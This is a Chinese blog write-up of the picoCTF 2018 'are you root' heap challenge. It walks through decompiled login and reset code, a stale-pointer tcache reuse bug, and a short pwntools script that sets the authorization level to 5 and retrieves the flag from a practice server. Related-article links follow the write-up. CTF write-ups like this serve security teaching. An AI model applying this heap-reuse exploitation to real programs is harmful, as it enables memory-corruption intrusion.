picoctf_2018_are you root

最新推荐文章于 2024-08-28 09:33:10 发布
最新推荐文章于 2024-08-28 09:33:10 发布
阅读量116 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132536134
版权

picoctf_2018_are you root

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x3ff000)

64位没开pie

看一下ida

发现有个give_flag函数,基本调用就可以getflag了

if ( v6 )
      {
        if ( *((_DWORD *)v6 + 2) == 5 )
          give_flag(s);
        else
          puts("Must have authorization level 5.");
      }

只要v6+2的指针,指向的内容是5就可以getflag了

看一下add

else if ( !strncmp(s, "login", 5uLL) )
    {
      if ( v6 )
      {
        puts("Already logged in. Reset first.");
      }
      else
      {
        nptr = strtok(v10, "\n");
        if ( !nptr )
          goto LABEL_11;
        v6 = (void **)malloc(0x10uLL);
        if ( !v6 )
        {
          puts("malloc() returned NULL. Out of Memory\n");
          exit(-1);
        }
        *v6 = (void *)(int)strdup(nptr);
        printf("Logged in as \"%s\"\n", nptr);
      }
    }

他这里是申请两个堆,

第一个堆,申请0x10大小的堆,并且放入第二个堆的堆指针

介绍一下strdup函数

他会调用malloc()函数并且不会自身free。并且把内容写入堆

所以再看一下free的过程

else if ( !strncmp(s, "reset", 5uLL) )
    {
      if ( v6 )
      {
        free(*v6);
        v6 = 0LL;
        puts("Logged out!");
      }
      else
      {
        puts("Not logged in!");
      }
    }

只free掉了v6的指针,也就是二号堆,并没有把申请的一号堆free掉,并且只清空了一号堆的[0]。

思路如下,我们利用

申请的二号堆,写入辣鸡数据,然后将[1]写入0x5然后free掉,进入tcache,然后再申请回来,此时的二号堆变成了

新的一号堆,里面存放着0x5。并且v6+2指向也是这个位置
在这里插入图片描述

然后我们就可以getflag了

from pwn import*
from Yapack import *
libc=ELF('./libc-2.27.so')   

context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",28577,"./pwn",10)

me=b'> '
sla(me,b'login '+b'a'*8+p64(0x5))
sla(me,b'reset')
sla(me,b'login ya')
sla(me,b'get-flag')

#debug()
ia()

在这里插入图片描述

YameMres
关注
专栏目录
ROOT.rar_ROOT_android root
09-19
【标题解析】:“ROOT.rar_ROOT_android root”这个标题暗示了我们正在讨论的是关于Android设备的ROOT权限获取过程。"ROOT.rar"可能是一个压缩文件,包含了用于Android设备Root的各种工具和教程。 【Android Root...
揭秘:网络安全新手如何通过PicoCTF平台快速升级?
Ms08067安全实验室
03-21 263
点击星标,即时接收最新推文文末赠书正在学习网络安全的同学们,你们都参加过 CTF(Capture The Flag)比赛吗?CTF 比赛是网络安全领域的一项引人瞩目的活动,吸引着无数热爱挑战和技术的玩家们投身其中。可能有的同学会有疑问,初学网络安全就参加 CTF 比赛是不是太难了?这种顾虑是有道理的,因为网络安全领域涵盖了诸多专业技术领域,如密码学、漏洞利用、逆向工程等,这些都是 CTF 比赛的重...
“黑客”营倒计时 - 体验由卡内基梅隆大学组织的信息安全竞赛
weixin_36841920的博客
02-21 382
眺望前方,有人看到是障碍,有人看到是更大的目标。PicoCTF 由卡内基梅隆大学组织,是全球最大面向中学生的网络信息安全竞赛。去年有7800多个队参赛。PwA队取得了前12%的优异成绩。在为期两周刺激的竞赛过程中,PwA的队员们挑战智力、毅力、体力,夺旗后的快乐感满满,在知识、能力和信心上,获得巨大提升。PicoCTF竞赛的设计原则是”玩乐中学” (Learn in play) ,极具趣味性和挑战...
推荐开源项目:picoCTF —— 打造你的专属网络安全竞赛平台
最新发布
gitblog_00112的博客
08-28 353
推荐开源项目:picoCTF —— 打造你的专属网络安全竞赛平台 picoCTFThe platform used to run picoCTF 2019.项目地址:https://gitcode.com/gh_mirrors/pi/picoCTF 项目概览 在网络安全领域,Capture The Flag(CTF)赛事以其独特的挑战性和教育意义而备受推崇。picoCTF 正是一个曾经用于运行2...
picoCTF,Forensics,取证类,43/50
Allezima阿力代码
02-10 2367
记录一下自己做的CTF,最初将所有题目放在一个帖子里,帖子太长了,为了方便后期编辑和阅读。2023年02月10日,将帖子拆分……
PicoCTF——Most Cookie思路讲解
npu2022303155的博客
04-25 947
1. 并没有手把手的步骤,只有一些经验。 2. 会有一些抓包图片来帮助理解,只是不知道有没有多此一举。
picoCTF,General Skills,基本技能类,34/34
Allezima阿力代码
12-28 2066
自己做的CTF,记录一下。后期不断编辑。
root.rar_ROOT_root MUSIC
07-14
求根MUSIC算法 非常有用 matlab 阵列信号处理 新手必学
root_music_1.rar_ROOT_root MUSIC
09-24
这里提到的"root_music_1.rar_ROOT_root MUSIC"标题暗示了我们正在讨论与安卓设备的root权限有关的内容,同时可能涉及到音乐播放或管理方面的应用。Rooting是安卓用户获取设备管理员权限的过程,这样可以访问和修改...
nfs_root.rar_ROOT_nfs root_根文件
09-14
本教程将深入探讨`nfs_root.rar`文件所涉及的`nfs_root`概念以及如何将其用作根文件系统。 首先,`nfs_root`是指通过NFS服务将远程主机的特定目录作为本地系统的根文件系统来挂载。这在无盘工作站、集群计算或系统...
const11.zip_ROOT_root nyquist
07-14
It shows the pass band convolution(root nyquist)concept.
picoCTF:picoCTF挑战的解决方案
03-31
微微CTF 您好,我将尽可能详细地发布针对picoCTF问题的解决方案。 我建议您先尝试自己解决问题,如果遇到困难,可以按照我的详细解决方案进行操作!
picoCTF-2020-撰写:picoCTF 2020解决方案的撰写
02-21
picoCTF 2020撰写 此存储库包含picoCTF 2020的字样,提示和解决方案。每个文件夹对每个类别都有相应的问题。 麻省理工学院 版权所有2021 Adam Jeniski和Caleb Garrick 特此免费授予获得该软件和相关文档文件(“软件”)副本的任何人无限制使用软件的权利,包括但不限于使用,复制,修改,合并的权利,发布,分发,再许可和/或出售本软件的副本,并允许具备软件的人员这样做,但须满足以下条件: 以上版权声明和本许可声明应包含在本软件的所有副本或大部分内容中。 该软件按“原样”提供,不提供任何形式的明示或暗示担保,包括但不限于对适销性,特定目的的适用性和非侵权性的担保。 无论是由于软件,使用或其他方式产生的,与之有关或与之有关的合同,侵权或其他形式的任何索赔,损害或其他责任,作者或版权所有者概不负责。软件。
[BUUCTF-pwn]——picoctf_2018_are you root
Y_peak的博客
03-09 341
[BUUCTF-pwn]——picoctf_2018_are you root 题目地址:点这里 害,有点小烧脑子这道题. 又学习了几个没见过的C语言函数 peak小知识 strtok: 第一次使用时候,需要两个参数从第一个参数开始,到第二个参数接断并且返回. strdup: malloc一个参数字符串大小的内存,并且将字符串拷贝进去. 正文 下面进入正文,首先checksec看下 再去IDA中看下, 好明显的暗示 紧接着去看看代码, 想要进入give-flag函数, 需要v6 不为0, 同时
picoCTF 2022 web
qq_61768489的博客
04-10 3445
Includes 看题目以为文件包含啥的 很简单,直接看源码,然后里面有 两个源码链接,点进去就是flag Inspect HTML 直接看源码。。 Local Authority 打不开网页 不过也是源码类的题目 Search source js源码找了半天没找到,还是在css翻到了 Forbidden Paths We know that the website files live in/usr/share/nginx/html/and ...
picoCTF 2023 Writeup By AheadSec
末初的CSDN博客
03-24 2504
picoCTF 2023 Writeup By AheadSec
picoCTF-RE-otp WP
weixin_43781139的博客
10-15 619
今天被大佬学弟带着做了一道国外的ctf,质量果然和国内的套娃题不一样,挺有意思的,写个wp纪念一下。 64位elf文件,无壳,用ida64打开,主要算法代码如下: int __cdecl main(int argc, const char **argv, const char **envp) { int result; // eax char v4; // al char v5; // dl unsigned int v6; // eax int i; // [rsp+18h] [rbp
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值